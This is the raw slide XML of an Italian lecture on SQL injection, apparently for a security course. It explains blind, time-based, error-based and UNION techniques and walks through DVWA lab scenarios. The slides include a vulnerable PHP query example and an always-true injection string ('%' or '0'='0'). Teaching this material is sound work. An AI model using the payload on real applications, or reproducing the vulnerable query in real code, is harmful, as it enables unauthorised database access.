          <a:xfrm>
            <a:off x="6062499" y="2219189"/>
            <a:ext cx="3995901"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3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>1. L’applicazione presenta un form all’attacker</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="3F3F3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3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>2. L’attacker inserisce uno statement SQL malevolo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3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>3. L’applicazione inoltra l’attacco al database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3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>4. Il database esegue la query malevola e restituisce le informazioni all’applicazione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it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>5. L’applicazione mostra le informazioni all’utente malevolo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Lista parziale Sql-injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="244" name="Google Shape;244;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2709020" y="1390073"/>
            <a:ext cx="2266648" cy="42191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23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773841" y="1061461"/>
            <a:ext cx="8478247" cy="3881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br>
              <a:rPr lang="it-IT"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Esempio codice vulnerabile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="Google Shape;255;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="861954" y="2061364"/>
            <a:ext cx="6011401" cy="976467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="861954" y="2881025"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-251459" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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it-IT" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Cosa succede se inserisco come domainName:</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="257" name="Google Shape;257;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046700" y="3857492"/>
            <a:ext cx="3018600" cy="446200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Risultati immagini per punto interrogativo" id="258" name="Google Shape;258;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540358" y="1112982"/>
            <a:ext cx="3409950" cy="4895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Tecniche di SQL injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489527" y="1708727"/>
            <a:ext cx="8784475" cy="4332635"/>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it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Boolean-based blind: </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Iniezione SQL basata su booleani è una tecnica inferenziale di SQL Injection che si basa sull'invio di una query SQL al database che forza l'applicazione a restituire un risultato diverso a seconda che la query restituisca un risultato VERO o FALSO. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A seconda del risultato, il contenuto della risposta HTTP cambierà o rimarrà lo stesso. Ciò consente ad un utente malintenzionato di dedurre se il payload utilizzato ha restituito vero o falso, anche se non vengono restituiti dati dal database. Questo attacco è, in genere, lento (specialmente su database di grandi dimensioni) poiché un utente malintenzionato dovrebbe enumerare un database, carattere per carattere.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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116246" y="849747"/>
            <a:ext cx="7262489" cy="4961050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Risultati immagini per punto interrogativo" id="156" name="Google Shape;156;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8378735" y="542225"/>
            <a:ext cx="2769856" cy="3976832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283134" y="2013526"/>
            <a:ext cx="1819563" cy="692727"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 5000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8" name="Google Shape;158;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8303490" y="2161309"/>
            <a:ext cx="15609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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Sicurezza</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Tecniche di SQL injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;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just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Time-based blind</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>si basa sull'invio di una query SQL al database che impone al database di attendere un determinato periodo di tempo (in secondi) prima di rispondere. Il tempo di risposta indicherà all'attaccante se il risultato della query è VERO o FALSO.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A seconda del risultato, una risposta HTTP verrà restituita con un ritardo o restituita immediatamente. Ciò consente a un utente malintenzionato di dedurre se il payload utilizzato ha restituito vero o falso, anche se non vengono restituiti dati dal database. Questo attacco è in genere lento (specialmente su database di grandi dimensioni) poiché un utente malintenzionato dovrebbe enumerare un carattere di database per carattere.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Tecniche di SQL injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;276;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="120073" y="1366983"/>
            <a:ext cx="9153929" cy="4674380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>error-based </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>si basa su messaggi di errore generati dal database server per ottenere informazioni sulla struttura del database. In alcuni casi, l'iniezione SQL basata su errori da sola è sufficiente per un utente malintenzionato per enumerare un intero database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Mentre gli errori sono molto utili durante la fase di sviluppo di un'applicazione Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="594360" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> UNION query </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>sfrutta l'operatore UNION SQL per combinare i risultati di due o più istruzioni SELECT in un singolo risultato che viene quindi restituito come parte della risposta HTTP.</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SQL Injection in DVWA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="282" name="Google Shape;282;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697018" y="1848779"/>
            <a:ext cx="4872101" cy="36635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418716" y="314036"/>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40"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2916"/>
              <a:t>Scenario 1: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="2916"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="2916"/>
              <a:t>Basic Injection </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="2916"/>
            </a:br>
            <a:endParaRPr sz="2916"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Google Shape;288;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="788170" y="1704109"/>
            <a:ext cx="6967585" cy="3851564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932873" y="5913689"/>
            <a:ext cx="74814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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$getid = "SELECT first_name, last_name FROM users WHERE user_id = '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="it-IT" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$id</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'";</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548025" y="184727"/>
            <a:ext cx="8254230" cy="68349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Scenario 2:Always True</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="KaliLinux [In esecuzione] - Oracle VM VirtualBox" id="295" name="Google Shape;295;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="215516" y="936032"/>
            <a:ext cx="6887333" cy="5538659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7232073" y="1477817"/>
            <a:ext cx="465512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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>In questo scenario, stiamo dicendo di visualizzare tutti i record </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>falsi</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> e tutti i record </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>veri</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT"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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> % '- Probabilmente non sarà uguale a niente e sarà falso.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'0' = '0' - È uguale a vero, perché 0 sarà sempre uguale a 0.</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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Dichiarazione del database</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql&gt; SELECT first_name, last_name FROM utenti WHERE user_id = ' </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="it-IT" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>%' o '0' = '0'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT"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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1889556"/>
            <a:ext cx="8215370" cy="3857652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="4572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Distribuzione Linux disegnata esplicitamente per penetration testing:</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405" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="474947"/>
                </a:solidFill>
